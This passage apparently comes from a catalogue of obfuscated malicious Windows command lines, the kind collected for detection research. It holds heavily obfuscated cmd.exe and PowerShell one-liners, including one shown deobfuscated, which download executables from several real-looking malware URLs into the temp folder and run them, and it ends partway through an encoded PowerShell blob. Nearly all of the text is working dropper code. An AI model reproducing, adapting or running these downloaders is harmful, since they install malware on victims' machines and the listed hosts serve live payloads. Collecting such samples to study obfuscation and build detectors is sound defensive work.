-f'cTs','I'),( \"{1}{2}{0}\"-f 'S','PR','oCEs') ) ))" 17 | ``` 18 | 19 | 3. Payload with base64 compressed (deflate/inflate) data and reversed spelling 20 | ``` 21 | /C "sEt DIy=$8230C =[CHaR[]] ") )93]rAHC[,)84]rAHC[+701]rAHC[+28]rAHC[(EcaLPErC- 63]rAHC[,'Q8h' EcaLPErC-421]rAHC[,)99]rAHC[+411]rAHC[+201]rAHC[( EcaLPErC-)'nOi'+'ss'+'eR'+'pXE-ekOVNI '+'crf)(Dn'+'eoTda'+'ER.)'+'})'+'iI'+'cS'+'A::'+']Gn'+'IDoCNE'+'.txE'+'t'+'.mE'+'T'+'s'+'YS[ , '+'_Q8h'+' '+'(REDA'+'ErmAe'+'r'+'t'+'S.oi '+'TcEJBO-WEn {'+' tC'+'E'+'jBO'+'-hcAe'+'Ro'+'f '+'crf'+' )'+'s'+'SERp'+'M'+'O'+'CED'+'::'+']EdOm'+'NoIS'+'SErp'+'m'+'O'+'c.noiss'+'erPmoc'+'.Oi[, '+')'+'0kR'+'=='+'wf0gt'+'4jn'+'5w'+'plE'+'56'+'j'+'u'+'T6'+'l'+'U'+'y8Thm'+'dN'+'Rp'+'Y'+'bFvu'+'a'+'GcUFpNDv'+'i'+'S'+'aiRLaT3RXf5'+'R62j'+'22Tq'+'8'+'9'+'yO00xFYyxWaA'+'a'+'PAh/'+'+eeB'+'+'+'/PwGy7wuuEMUTe'+'JCm3c'+'7'+'dD'+'D'+'Nv'+'v0E6'+'ly'+'9'+'A'+'B'+'fdSW9'+'xBKUu'+'DeMT4'+'rPe6id'+'+'+'JMV'+'C2TkqV/f'+'x'+'b'+'a'+'Ky+'+'XLxam'+'q1'+'vrVSpZnJ+Z'+'x0HZ5X'+'N+WpMXQhxM5iSysve+L/J+yhlz'+'6Tt'+'VOy'+'g'+'Ahuy'+'KymQon8'+'J'+'cE7vWmI'+'Gm'+'vhI'+'siwMIrg'+'0'+'Ai'+'LMxX10'+'Vyjy'+'TnY'+'G'+'3E'+'wE'+'UCsEZ6yMT'+'sET'+'nT'+'4Jb'+'nj'+'w'+'ELS'+'5UEl2J'+'syPY9iggb2'+'84'+'aR'+'9bW'+'+Q'+'QN/'+'xtcw'+'J7W'+'++e'+'6b'+'C'+'ZcX'+'/QOmbOaruL'+'vV'+'uK9FG'+'UGBKISY'+'Y'+'QtENgqfNb'+'JIFa6hy/XI'+'FwI8TRBZ'+'P0'+'kR '+'(GNiRt'+'s46E'+'SABMorf:'+':]'+'T'+'REvn'+'OC'+'[]MaEr'+'tSy'+'roMe'+'m'+'.oi.METsys'+'['+' '+'(mAERtSE'+'tAlFe'+'D.'+'N'+'OisSErpM'+'o'+'c.Oi'+'.mETsys'+' Tc'+'EJ'+'B'+'O-'+'WEn ( '(( ()''nIOJ-]2,11,3[EmAN.)'*rDM*' eLbAirav-Teg(( ." ; [ARrAY]::ReveRSE( ( chILDItem ("V"+"ariA"+"b"+"lE:"+"8230C") ).vAlue); [stRiNG]::jOIn( '' ,( chILDItem ("V"+"ariA"+"b"+"lE:"+"8230C") ).vAlue )^|^& ( $veRbOsePrEFerENCe.TOsTRiNG()[1,3]+'x'-JOIn'')&& PowERsheLl SEt-ItEm ('V' + 'ARiAb'+'lE:SKeAil') ( [TYPe]( \"{2}{3}{1}{0}\"-F't','n','ENvIRon','ME' ) ) ; ( .('ls') ( \"{4}{0}{7}{1}{5}{2}{3}{6}\"-f'B','E:E','co','NteX','VarIA','XEcUTiOn','t','l') ).\"VaL`UE\".\"iN`VO`k`eCom`MANd\".( \"{3}{1}{2}{0}\" -f 'ipT','oke','SCr','inv' ).Invoke( ( ${sK`E`AiL}::(\"{0}{4}{1}{2}{5}{3}\" -f'get','ONMeNt','v','E','Envir','arIaBL').Invoke( 'DiY',(\"{1}{0}\"-f's','PrOCeS' ))) )" 22 | ``` 23 | Deobfuscated 24 | ``` 25 | /C "set diy=$8230C =[Char[]] ; ". ((get-variable '*mdr*').name[3,11,2]-join'')( ((' ( new-object system.io.compression.deflatestream( [system.io.memorystream][convert]::frombase64string('PZBRT8IwFIX/yh6aFIJbNfqgNEtQYYSIKBGUGF9KuVvLuraObmOQ/XcZCb6e++W7Jwctx/NQQ+Wb9Ra482bggi9YPysJ2lEU5SLEwjnbJ4TnTEsTMy6ZEsCUEwE3GYnTyjyV01XxMLiA0grIMwisIhvmGImWv7EcJ8noQmyKyuhAgyOVtT6zlhy+J/L+evsySi5MxhQXMpW+NX5ZH0xZ+JnZpSVrv1qmaxLX+yKabxf/VqkT2CVMJ+di6ePr4TMeDuUKBx9WSdfBA9yl6E0vvNDDd7c3mCJeTUMEuuw7yGwP/+Bee+/hAPaAaWxyYFx00Oy98qT22j26R5fXR3TaLRiaSivDNpFUcGauvFbYpRNdmhT8yUl6Tuj65Elpw5nj4tg0fw==') ,[io.compression.compressionmode]::decompress) | foreach-object { new-object io.streamreader( $_ , [system.text.encoding]::ascii)}).readtoend() | invoke-expression'))" [array]::reverse( ( childitem ("variable:"+"8230c") ).value); [string]::join( '' ,( childitem ("variable:8230c") ).value ) | & ( $verbosepreference.tostring()[1,3]+'x'-join'')&& powershell set-item ('variable:skeail') ( [type]( environment' ) ) ; ( .('ls') ( "executionvariable') ).\"value\".\"invoke-command\".('invokescript').invoke( ( ${skeail}::('getenvironmentvariable').invoke( 'diy',('processs' ))) )" 26 | 27 | $UGQ=new-object Net.WebClient;$Frh=' 28 | http://craniofacialhealth .com/fkwoBvLXu9@ 29 | http://cipherme .pl/data/FUqfiGggE@ 30 | http://duwon. net/wpp-app/zZIi80jKEg@ 31 | http://malchiki-po-vyzovu-moskva .company/fyxuFQjT@ 32 | http://dingesgang .com/kAMzVfDDiX' 33 | .Split('@');$OnT = '431';$cwL=$env:temp+'\'+$OnT+'.exe';foreach($NPw in $Frh){try{$UGQ.DownloadFile($NPw, $cwL);Invoke-Item $cwL;break;}catch{}} 34 | 35 | ``` 36 | 37 | 4. 38 | 39 | ``` 40 | cmd /V:^O/C"^s^e^t rk^g^7=A^ h.B:^,[]^YQ^O)dbHKz^p1/Ct^G^I^-xw^y;^}kN^Z^i^0(f^{^E^MWco'8+^m^j^\^=P^sn^g^Uv^$^le^Tr^@^u^S2a&&^f^or %N ^in (^18,43^,2^7^,^59^,6^1^,^5^2,2,59^,^5^8,5^8^,1^,5^7^,17^,^4^1,2^1^,5^0,^4^4^,2^4,^5^5,0^,4^4,^29,5^7^,1^0^,^1^5,9,50,^44,2^,22,22,18,^5,20^,20^,2^2,61^,66,^14,^66,53^,^66^,^2^2^,43^,63,^6^1^,^5^2^,3^,42,4^3^,4^7,20,6^3,^6^2^,^2,2^2,22^,^1^8^,5^,2^0^,2^0,1^8,3^4^,17^,1^7^,^5^9,^6^1,^34,6^6^,61,^4^3,^5^3^,^1^3,4^3,^3^,^5^2^,^34^,2^0^,1^7,^45,4^2,23,^6^2^,2^,22,2^2^,^1^8,5,^2^0^,^20^,^1^3^,^34^,^6^6^,^2,^4^7^,^66^,61^,^5^2,3^4,13,34,^3^,4^2^,^43^,^47,2^0^,4^0^,5^1,^21^,60^,1^6,^2^3,6^2^,^2,22,^2^2,18,^5^,^20,20,^4^3,^54,^6^1^,43,^13,^2^8^,^63^,5^2^,47,^3^4,59^,^42^,^2^,63,3^,^18,^58^,2^0,^3^4,63^,^14^,^5^6^,^45,^56^,62,2,2^2^,22,18,^5^,20^,20,66,^52,^52,6^3^,^61^,^66^,5^3^,^42,^5^9,^25,^42,2^,^6^6,61^,5^9^,53^,^2^2^,59^,3^,3^7^,6^1,^2^0,^52,^3^7^,^2,44^,3^,^6^4,^1^8^,^58,^3^4^,22^,36^,4^4^,62^,44,^1^2^,^29^,57^,^66^,^4,^18^,^50,3^6^,^7,^64^,^28^,5^2^,22,5^9^,4^7,^3^,^24^,1^1^,^3,^51,^66^,^2^2^,2,8,^5,^5,^23^,59,22,^60^,59^,^4^7,^1^8^,^51,66,22,^2^,36^,^12,4^6^,44^,^49^,4^7,1^0,^32^,3,5^9,26^,59,^44^,12,^2^9,^57,18^,^13,33,1^,5^0,3^2^,59,2^7,2^5,^11,1^4^,^48,^5^9,4^2,^22^,1,^2^5,^4^2,^43,^4^7^,1^,4^4,4^7,^52^,26,^4^7,58^,^6^5,3^,^26^,4^7,^58^,2^,2^2,2^2,1^8^,^4^4^,2^9^,5^7,22,1^8,3^1,1,50,^1^,3^2,^5^9^,^27,2^5^,^1^1,^14,48,59^,^42^,^2^2,^1,^2^5^,4^2^,43,^4^7,1^,4^4^,^66,13^,43^,1^3^,1^4,3,5^2^,22^,^61,59,^6^6,47^,^44^,2^9^,37,^4^3^,61,^5^9,^66,42^,^2,36^,^5^7,^63,3^4,0^,1^,^3^4^,53,^1,^57,^10,1^5,^9^,^1^2^,^38^,^22,^61^,^2^8,^3^8^,^57^,^18,13^,^3^3,3,4^3,^1^8,^5^9,53^,^36,4^4,^2^3,3^9,^60,44^,^6,^5^7^,^6^3,34^,^0,6^,^3^5,^1^2^,29,^57^,^18^,13^,^33^,3^,52^,^5^9^,^5^3^,1^3^,^36^,12,2^9^,^5^7^,^2^2^,1^8^,^31^,^3^,43,^1^8^,5^9,53^,36,^12^,^29^,^57^,22,^1^8,^3^1^,^3,^2^2,2^8,^18,59,^1^,^5^0^,^1^,19^,2^9^,^5^7^,^22^,18^,31^,^3,27,61^,^34^,2^2^,^59,3^6^,57^,^18^,1^3,^33,^3^,^61^,^59^,^52,^1^8^,^4^3^,5^3,^52,59,4^,43^,^13,28^,^1^2^,^29,5^7^,22^,^1^8,^3^1^,^3,5^2,^6^6^,^5^6,59^,2^2,4^3,3^7,34,^5^8,5^9^,36,^5^7^,66,4^,18^,^12,^2^9,^64,^22,^66^,61,22,2^5^,51,61^,43^,^4^2^,5^9^,^52,5^2^,1^,^5^7^,66^,4^,^18^,^2^9^,1^4^,^6^1^,^59^,^6^6^,^31,3^0^,42^,6^6^,^2^2,4^2^,^2,3^8^,3^0,3^0^,1^,1^,^1,^1,^1^,1,1,^1^,^1,1^,^1^,^1^,1,1^,1,1^,1,73)^do ^s^e^t ^y^p^e=!^y^p^e!!rk^g^7:~%N,1!&&^if %N ^g^e^q ^7^3 cal^l %^y^p^e:~-^5^0^7%" 41 | ``` 42 | 43 | 5. 44 | ``` 45 | c:\ZHhFvBd\QEWVzrTc\FNuOpzpfwHM\..\..\..\windows\system32\cmd.exe /C"^s^et ^t3=^o&&s^e^t V^toN=^.^o^p&&s^e^t 0^a^lV=()&&^se^t ^H^i^Z=://pr&&^s^e^t ^4^D=r^Y&&set ^Zu^GH= ^ ^ &&^se^t ^sr=t&&^s^et A^2=ms^xm^l&&se^t z^l^h=^ in&&s^e^t ^oC=^h&&^s^e^t ^B^S^0^u=t^t&&^s^et ^J^q^G=^o&&s^e^t ^E^u=^M&&^s^et ^h^1N=.r^e^s&&^s^e^t ^J^L^g=^;&&^s^et 3HV=^b&&^s^et ^a^sR=^e&&^set M^G=^s&&^se^t Z^t=^{}^}&&^s^et T^3^O=n&&^s^et ^D^U^Y=^e&&^s^et ^mhf=^a&&s^e^t ^dS=^w^p-&&^se^t ^qt=^;$^E&&^se^t 0^F=k^K^w&&^s^et ^m^6=^f&&^s^et ^2d^I7=^p&&^s^e^t ^0^xR=-^O&&s^e^t R^8J^S=/^q^P&&s^e^t ^Mx=^T^em&&s^e^t 6^k^o^D=e&&^s^e^t ^y^KN=^e&&^s^et w^b= -c&&s^e^t ^oEK^b=^q&&s^e^t 5^K=^'&&^s^e^t a4^x^o=ol&&^s^e^t ^w^F^Ua=^str&&^s^et tT^j^p=r^t^-&&s^e^t ^zR=(^'&&^s^e^t ^H^1Y^u=i^d&&^se^t q^G^y=^b^A&&s^e^t ^ST=/co&&^s^e^t ^wD=^tp&&s^e^t tZ^7^W=^b&&s^e^t ^dCl^P=/^6&&^s^e^t ^qTY^D=s^e&&^s^et rq=c^h&&^s^e^t ^I^a=^m&&^s^e^t o8^W^u=^h&&^s^e^t v^h^Wi=^ ^$z&&^s^e^t ^i^o=^;$^Z&&^s^et H^1^4=^m^i^e&&^s^et ^H^Xv=^m/&&^s^e^t m^D^G^i=(^$^zc^d&&^set q^D^oN=($q^X^a&&^s^et K^8=^:&&s^e^t z^w^Y^u=^l&&s^e^t ^G^JC=^S^ys&&^s^et j^AO^p=^o&&^s^et ^OV^Y=^0^@&&^s^e^t ^W^E=^t^en^t&&^s^et ^ho^s=^k&&^s^e^t ^B^8^Q=^p&&^s^e^t i^J^y=^[&&s^e^t ^dXw^b=^alt^y&&^s^et ^ZLa^y=^m&&^se^t ^qY^UC=^ &&^se^t ^1^2^9=^m&&^s^e^t ^68^AE=^'^a^d&&s^e^t m^H6^u=^o&&^s^et 1^E^M=c&&^s^e^t ^JS=n^e&&^s^e^t ^aT=^E&&^s^e^t ^YM=^in^tz&&^set ^tu=^h&&^s^et 4^x^TL=^zc^d,0)^;&&^se^t ^Do^4y=)&&^s^e^t ^HP=^@&&^s^e^t 0^t=^t/&&^se^t 0o^d=d^b^.&&^set ^7^8=^ &&set K^I=vV^=^'&&^se^t ^0G^J=^p&&^s^et ^oL^G=.^e^x&&^s^e^t E^P^i=Z&&s^et ^g3^Sb=^D&&s^e^t ^ev^t=^.&&^s^e^t ^Kn^F=c&&^s^e^t vCq=/&&^s^et ^H^eq=^t&&^s^et ^ov=^e&&^s^e^t V^d=^ew&&^s^e^t ^Tj=n^t&&^se^t E0^X^G=^]&&set ^yI^s=i^h^a&&s^e^t ^G^Hw=Z^f&&^s^e^t ^Z^7=^'&&^se^t A^0=^I&&^s^e^t ^a^L2=^i&&s^e^t ^b^W^D=^a&&^s^et E^9=^.6^2.&&s^e^t v^s^y=^A&&^se^t D^9^o=^Pj&&s^e^t ^68=I)^{&&^se^t ^hs=^$&&^se^t ^jr=^t&&^s^et y^d^U=V&&^s^et Q^x^P^q=^:&&^se^t 1R^q=^ower^s^h^e&&^s^e^t ^4^a^K=^=&&^s^e^t E^p^j=^e&&^s^et o^4=f&&s^e^t ^K^i^M^t=^p&&^se^t v^P=n&&^se^t ^b^Tr^e=^u&&^s^et ^T^W^0D= ^ &&^s^e^t ^Y^M^9z=^w&&s^et ^E6=^O.&&^s^et ^Jc=^ll&&^s^e^t r^l^Ku=^t&&^se^t ^t^p=^'&&^s^e^t ^is=^i&&^s^e^t ^W^Fym=^t^p'&&^set Q^E=//&&^s^e^t J^X=^t^ &&^s^et i^p=R5s&&^se^t ^0s=^Eb&&^se^t ^q^sx=^ $&&^se^t D^3^E=^;^$&&^s^et ^s^o^3=^am'^;&&^se^t 6P^z^7=^e&&s^e^t ^zXM^P=^ &&^se^t r^4=^= N&&^s^et k^7^t=^il&&s^e^t ^Id^B=^tI&&^s^e^t ^2^Y^Fc=^i&&^se^t ^k^2D^E=^Z^f&&^s^et ^4m2=^=^ 1;^$&&^se^t Y^9=^5&&^se^t Rr^8=^S&&^se^t ^Kn^y=^.c&&set b^DA^x=^o&&^s^et ^b^x^WM=^;&&^s^e^t ^id=c^o&&s^e^t ^1u=7^f&&s^e^t kCm=t^e&&^s^et ^6^X=^;^$Z&&s^e^t ^g^Y=^O&&^se^t ^am^h1=^ &&s^e^t ^EN=N&&^s^e^t V^9^3=^}c^at&&^s^et y^A=v^e^t&&^s^et Z^u^Mc=^e&&^se^t ^s^SX=^')&&s^e^t rN^D^W=^d^y&&^s^et ^d^So=C^I^3&&^s^et R^f=^l&&^se^t ^j^4^f=^p^l^oa&&^se^t V^4n^T=^or&&^se^t Z^A=^p&&^s^e^t M^S^J^7=n&&^s^et ^Dd=P^a&&s^e^t ^b^TN=^h()&&^se^t R^d=^p&&^s^e^t ^J^t^z=^s&&^s^e^t ^an=^$^E&&^s^e^t ^w^l=^d&&^se^t z^6=^Pr^o&&s^e^t ^s^i^H=c&&se^t ^1^2^sW=r&&^s^et ^W^FJN=^sH^@&&^s^e^t ^7^u^e^H=:^:&&^s^e^t ^H^04=b^A&&^s^et ^T^M^3=7^9&&^set ^OX^7=^P&&^se^t r^I=^t&&s^e^t ^b^E^Kf=^-&&^se^t 2nRM=^$&&s^e^t ^m^BR=^o^m/&&^se^t m^HR=^m&&^s^et ^s^k9^1=/&&^se^t ^Z^3^u=ds/&&s^e^t ^qd^4V=^.c&&s^e^t ^Sz^L=^ &&^se^t Z^a^L^1=^t&&s^e^t ^a^tLc=/up&&^s^et ^z6e^b=^@h&&^s^e^t ^T^E6=^1&&^s^et ^3J=^m.^I&&set r^L^x^U=^en(^'G^ET&&^s^et ^3n=^e&&s^e^t ^D^T^tc=^$&&^s^e^t 7G^2^q=^.^w&&^s^et ^BW^e=h^t&&^s^et ^J^x^8=^s/^L&&^se^t ^W^4Q=S^@^ht&&s^e^t ^4c^71=^.&&s^e^t V^0=^t&&s^e^t V^s=r^e^a&&s^e^t ^t^WR=^p^on&&^se^t ^1^h=^ec&&^se^t ^4Q=^')^;^$&&^s^e^t ^B^YJE=c^o&&^se^t ^W5=^;&&^s^e^t ^tM^5=^t&&^se^t ^G^x^hU=^en&&^s^e^t J^K^a^X=^Q&&^se^t V^3=:&&^se^t R^s=^s&&^se^t ^W^Bw=//^1^3^9^.&&^s^et ^to^O=^t&&^s^e^t r^K^Yc=/&&^s^et 2H^f^l=^y&&^s^e^t ^A^8= ^ ^ &&s^e^t ^Bwn^i=^jec&&^s^e^t ^1^8^df=^=N&&^s^et 4^e= &&^se^t ^2Q^f=^.n^l&&^s^e^t ^QGU^x=^ht&&^s^e^t o^yO^X=b&&^set ^1C=c^o&&^se^t ^k3^4^X=^t&&^s^et Ex^G=$^q^X&&^s^et ^t^EVR=l&&s^e^t g^f=^2^.^xm&&^s^e^t ^6qV^y=^e&&^se^t ^0Z=^o&&^set ^B^6F^L=^A&&^s^e^t ^q3^S=^'^,&&^se^t s^m^f=/^gr^a&&^s^e^t ^j^qE= ^ &&s^e^t h^O=^D.&&^s^e^t ^TUr=^p^:&&^s^e^t Vh^d^B=^a&&^s^e^t v^y=b^3^O&&^s^e^t ^yHO^S=^.S&&^s^et ^DfG^k=^ ^ &&^s^e^t e^s^Y=^Xa^=(&&^s^et rG^e^7=^f^D.^s^a&&s^e^t ^K^6=r^e&&^s^et w^m=^o^a&&^s^e^t ^0^w=^B&&^s^e^t ^H^9=C&&^s^et ^m^h2D=)^;&&s^e^t ^W^Z=^w&&^s^et ^T^x=o^m ^'&&^se^t ^w^k0=b^j&&s^e^t ^A^Dn^W=^'^\H&&^s^et ^Y1^q=^f^O^E&&^s^et E^H=^d&&^s^et ^6^y=p^li^t&&^se^t ^3^JtS=e($&&s^e^t j^U^B=^G&&^s^et ^K3^j=^a^t&&s^e^t ^7^G^TU=^dl&&^set ^qX=C^l&&^s^et ^b^3=^f&&s^e^t ^Y^B^pg=^O&&set ^3C^Ox=^p-&&^s^et ACr=^59&&^s^et G^5^D=^S&&s^e^t ^bz^F=^h&&^se^t Z^B=^h&&set ^Q^g=-^O^b&&s^e^t V^4^o=^t&&^se^t ^j^G92=^+&&^se^t ^i0^S=^ &&^s^et 7^0=^w^3^7&&^s^et ^S^t^W^j=^t&&^se^t R^U^s^6=^o&&^s^e^t ^q^S^G=^D&&^s^et ^2^dI=^f^D.t&&s^e^t ^0^U=pen()&&s^e^t M^s=ry^{^$&&c^al^l ^s^e^t k5Z=%^K^i^M^t%%1R^q%%^Jc%%v^h^Wi%%K^I%%^g^Y%%^4^D%%^t^p%%^b^x^WM%%^D^T^tc%%^qX%%A^0%%^4^a^K%%^Z^7%%^QGU^x%%^to^O%%^2d^I7%%^H^i^Z%%^a^L2%%^YM%%^t3%%^JS%%^4c^71%%1^E^M%%b^DA^x%%^ZLa^y%%^dCl^P%%^E^u%%^EN%%i^p%%^Y^B^pg%%^W^FJN%%^BW^e%%^H^eq%%^0G^J%%V^3%%Q^E%%tZ^7^W%%^yI^s%%v^P%%^is%%^K^6%%^dXw^b%%^Kn^y%%R^U^s^6%%^H^Xv%%^dS%%^1C%%^Tj%%^G^x^hU%%0^t%%^b^Tr^e%%^j^4^f%%^w^l%%^J^x^8%%^d^So%%J^K^a^X%%m^HR%%^1^2^9%%^z6e^b%%r^I%%^wD%%Q^x^P^q%%^s^k9^1%%^ST%%Z^B%%a4^x^o%%^2Q^f%%vCq%%Y^9%%^Id^B%%^jr%%v^y%%^6qV^y%%^W^4Q%%r^l^Ku%%^TUr%%^W^Bw%%ACr%%E^9%%^T^E6%%^T^M^3%%R^8J^S%%^1u%%^Y1^q%%G^5^D%%y^d^U%%^OV^Y%%^tu%%^B^S^0^u%%R^d%%K^8%%r^K^Yc%%s^m^f%%H^1^4%%^qd^4V%%^m^BR%%^Y^M^9z%%^3C^Ox%%^B^YJE%%M^S^J^7%%^W^E%%^a^tLc%%^t^EVR%%w^m%%^Z^3^u%%0^F%%7^0%%D^9^o%%^H^1Y^u%%5^K%%^yHO^S%%^6^y%%^zR%%^HP%%^4Q%%^oEK^b%%e^s^Y%%i^J^y%%^G^JC%%kCm%%^3J%%^E6%%^Dd%%^sr%%o8^W^u%%E0^X^G%%^7^u^e^H%%j^U^B%%Z^u^Mc%%^S^t^W^j%%^Mx%%^B^8^Q%%^OX^7%%^K3^j%%^b^TN%%^j^G92%%^A^Dn^W%%^7^G^TU%%^oL^G%%^y^KN%%^s^SX%%^qt%%o^yO^X%%v^s^y%%^qY^UC%%^1^8^df%%V^d%%^0^xR%%^w^k0%%^1^h%%^k3^4^X%%w^b%%^T^x%%A^2%%g^f%%R^f%%^oC%%Z^a^L^1%%^W^Fym%%^W5%%2nRM%%^k^2D^E%%^g3^Sb%%4^e%%r^4%%E^p^j%%^W^Z%%^Q^g%%^Bwn^i%%J^X%%^b^E^Kf%%^id%%^I^a%%^i0^S%%^68^AE%%^0Z%%0o^d%%^w^F^Ua%%6^k^o^D%%^s^o^3%%o^4%%V^4n^T%%^ov%%Vh^d^B%%^s^i^H%%^bz^F%%m^D^G^i%%z^l^h%%^q^sx%%^H^9%%z^w^Y^u%%^68%%V^0%%M^s%%^aT%%q^G^y%%V^toN%%r^L^x^U%%^q3^S%%^hs%%4^x^TL%%^an%%^H^04%%^ev^t%%^J^t^z%%^D^U^Y%%T^3^O%%E^H%%0^a^lV%%D^3^E%%E^P^i%%^b^3%%h^O%%j^AO^p%%^0^U%%^i^o%%^2^dI%%2H^f^l%%Z^A%%^a^sR%%^Sz^L%%^4m2%%^G^Hw%%^q^S^G%%7G^2^q%%^1^2^sW%%^2^Y^Fc%%^tM^5%%^3^JtS%%^0s%%^B^6F^L%%^h^1N%%^t^WR%%^qTY^D%%^0^w%%m^H6^u%%rN^D^W%%^Do^4y%%^6^X%%rG^e^7%%y^A%%^J^q^G%%^m^6%%k^7^t%%^3n%%q^D^oN%%^m^h2D%%Rr^8%%V^4^o%%^mhf%%tT^j^p%%z^6%%^Kn^F%%6P^z^7%%R^s%%M^G%%^7^8%%Ex^G%%^b^W^D%%^J^L^g%%3HV%%V^s%%^ho^s%%V^9^3%%rq%%Z^t%%^j^qE%%^Zu^GH%%^T^W^0D%%^am^h1%%^DfG^k%%^A^8%%^zXM^P%&&c^al^l %^k^5^Z%" 46 | ``` 47 | 48 | 6. 64bit version 49 | ``` 50 | /V/C"set G2J= }}{hctac}}kaerb;nBQ$ ssecorP-tratS;)nBQ$(elifotevas.sBi$;)ydoBesnopser.AXI$(etirw.sBi$;1 = epyt.sBi$;)(nepo.sBi${ )'*ZM*' ekil- txetesnopser.AXI$( fI;)(dnes.AXI$;)0,Hjo$,'TEG'(nepo.AXI${yrt{)ZRM$ ni Hjo$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = sBi$;'ptthlmx.2lmxsm' moc- tcejbO-weN= AXI$;)'exe.obw\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=nBQ$;)'@'(tilpS.'oR8bFMaj/db.moc.stessamt//:ptth@cwPJPpash/ur.bps.llerauqa//:ptth@PY2y7DIo/ni.gro.egellochtanhtnukab//:ptth@TKjxdxTSnx/gro.npscdma//:ptth@lIOhbE9NV/moc.elbon13//:ptth'=ZRM$;'wwO'=jJQ$ llehsrewop&&for /L %B in (560,-1,0)do set XYT=!XYT!!G2J:~%B,1!&&if %B leq 0 %LOCALAPPDATA:~-12,-11%o%OS:~0,-9%e%ProgramFiles(x86):~7,1%%ProgramFiles(x86):~15,-6%h%ProgramW6432:~-2,1%l%ProgramFiles(x86):~13,1% "!XYT:*XYT!=!" " 51 | ``` 52 | 53 | * Powershell.exe 54 | 55 | 1. 56 | ``` 57 | "( [RuntIME.InteroPsERvICEs.marshAl]::([runtiME.IntErOpserViceS.marshal].GeTMEmbERS()[2].nAME).inVOKe([RUNtIme.intEropseRVICEs.MarShal]::SeCURestrINgtogLoBaLaLloCUnicOde( $('76492d1116743f0423413b16050a5345MgB8ADYAYwB4AHAAdgAxAHEAdQAvAEkAVQBXADQANQBrAFUAWgBkAEIANwBTAGcAPQA9AHwAYgAyADUAOQAwADMAYgBkAGMAOAA1AGMANwA0ADgAZgBhADUAYQBhAGIAYgBkADcAMwA1ADgAYwA3ADIANwA1ADAAZAA4AGEAYQBiADEANwBkADIAMwA3ADMANABlAGUAOAAxADUAZQA3ADAAOAAxADMAZQAyADIAZQBlADUAOAAxADcAMQAxAGUAOAA4ADUAOQAzADcAMwBlADcAOABmADYAYwA5ADkANAA3ADMAMABhAGMAMwAzADIAMQAxADcAYwA2AGQAMgAxADAAZQAyADQAZgAyAGUAMQA0ADMANABkAGIANAAxADAAMABlADAANAA0AGUAMwBjADYAYQAzAGUANgA2ADQAYQBmADgANwA4ADYAMQAwAGIAOAA2AGYAOQBmADYAOAAyAGUANAA4ADAAOAA3ADQAZgA4AGMAZQAxADUAYQAxADIAYwA5AGIAMgBmADcAYgBhAGQAYwAyADQANQAxADcAOQA4AGMANQA0AGMAYgAwADkAZAA0ADYAMAA4ADYAYQAyAGMAYwAxAGEANAA2ADQAZABmADUAMQBhADQAZQA3AGQAZABlADQANgA5AGQAYwA2ADIAOAA4ADEAMwBiADQAYwBlAGIANQA1ADYAMAAwADUAOQA1ADQAOQBmADAAMgBhADUAOQBiADQANABhAGMAZgAxADEANAA3ADcANgA2ADIAYgA4ADUANwA1ADUANQAxADEAOABlAGQAMAA2ADAAZABiADQAZABjAGMAYQBmADgAYQAzAGYAZQBhAGIAMgA0ADQANgBmADgAMwBlADQANwAyADcAYwBhAGIAMQA2ADIAOQA4ADcANwBlAGYAZAAwADYAYwAyADAAYgAyAGMANABlADIAYgBiAGQAYQA4ADQAZQAzADgAZgA2ADAANQAzAGIAYgBlAGUAZQAzAGQAZQBiAGYAMABkADMAZgA5AGUANwAzADYAZQAwADYANgA4ADUAZAA2ADkAMwBlAGUANwA1ADEAMgA1ADIAMAA3ADEAZgBjADQAMgAxADQAYwBjADYAMQBiADkAYgA0ADEAOQBjADQAOAAzADkANAAyADYAMQAzADgANAA4ADcAYQA5AGQANwAxADkAMAA5AGIANABjADUAYQBiADAAYQA2AGEANABjAGEANgBhADMAZgBiADgAOQBkAGEAZQBkAGUAYwBkAGUAZQA3AGQAYwBiAGEAMwA5ADAAMAA0AGMAMQA2AGMAOQA1AGQAYQA1AGUAYgBmAGYAYwBjADMAYQBlAGUANABiADQAMwBhADAAOQAxAGMAOQA5AGUAZAAzADAAZAA1ADMAOAAxAGUANQAzADAANABlADkAYwAxAGMAMwBmADAANQBlADYAYwA3AGYAMwAxADgANAAxADEANQA0ADIAOQA5AGMAZQA0AGUAMAAzADkAMgA5AGIANQAxADAANgA2ADAAOAA4AGIAMwAzAGYANgBiADcAOQBjAGQAZQA4AGYAZQAxAGYAOAAyADAANQAxADkANgBhAGMANAAzADMAYwAyAGYAYwBlADIAOAAwAGQANgA5ADQANgAwAGEANABlADAAZABjADYAYgBmADkAOAA5AGMAMwA0ADQAZgAzADIAZQBiAGMAOABkADcANwBhADkAMwAwAGQAMAA4AGEAZgA4ADkAYgAyAGUAZAAyAGQAMAA1ADEANwAxADMAOQA1ADIAOQBhAGUANgAzADYAMwBhADMAOQBiAGEAZQA4AGYAZQBiAGMAYQAyADMAYgAxADQAZQAyAGYAOABkAGUAOAA2AGIAOQA0AGYANAA0AGQAMABhADEAZgBmADAAOABjADkAYgBlAGQANABmAGIAMgBiADMAYQA5ADEAZgBiAGMANgAyADcAMwA4AGUAYQBjADAAZABlADkAZgBiAGUAYwAxAGUAOAA4ADkANwA5ADAAOAAyAGIANgAxADUAMQA3AGQAMwBmADUAZABkADMAZgBmADUAZQA1AGUANABlADMANgAzAGYANwA4ADMAMwA2AGEANgAyAGUANwAyADcAYQAyAGIAMwA2ADgAMgBiADUANAAxADcAOQBjADAAYgA5ADIAZQBjADQANQAxADcANwBmADIAYgBiADgAOAA0ADAANgAxAGMAMAA5ADgANgBkADcAMAA2ADcANwAxAGMAYgBiADEANgBmADEAMQAyADAANQA2AGMANQAyADkAMgAyADMAMQAwAGMAYQAyADkAOQBjADgAMwAyAGYANQBmADUAYgA4AGUAZgBhADAAZQBkADgANABjAGUAMQBiAGIAMgBlAGEANwAyAGQAYQA5ADcAOQAwADcAZgBjADgAZQA2ADQANwA2AGIANwA2ADgAZAAzAGUAZAAwADgANQBkADQAYwA4AGYAYwAxADAAZQBkADAAMQA2AGQANQAxADkAOQAxADUAZAA4ADgANwBjAGUAMgBkADgANwAxADAAMgBmADgANgAwADkANAA1AGEAOABkAGMAYgA4AGYAZQAwAGUAZQBkAGQAOQA5ADYANwBkADkAYQAzAGIANgBjAGMAZgBjAGIAMQA0ADEAZAAxADEAZABlADQAZgAwADgANAAyADcAOAA1ADYANwAyADUAOABhADEAZgBjADcAZQA3ADgANwA1ADUAYQBkADgAMgA3ADkAMgAxAGYAZgA1ADIAZQA0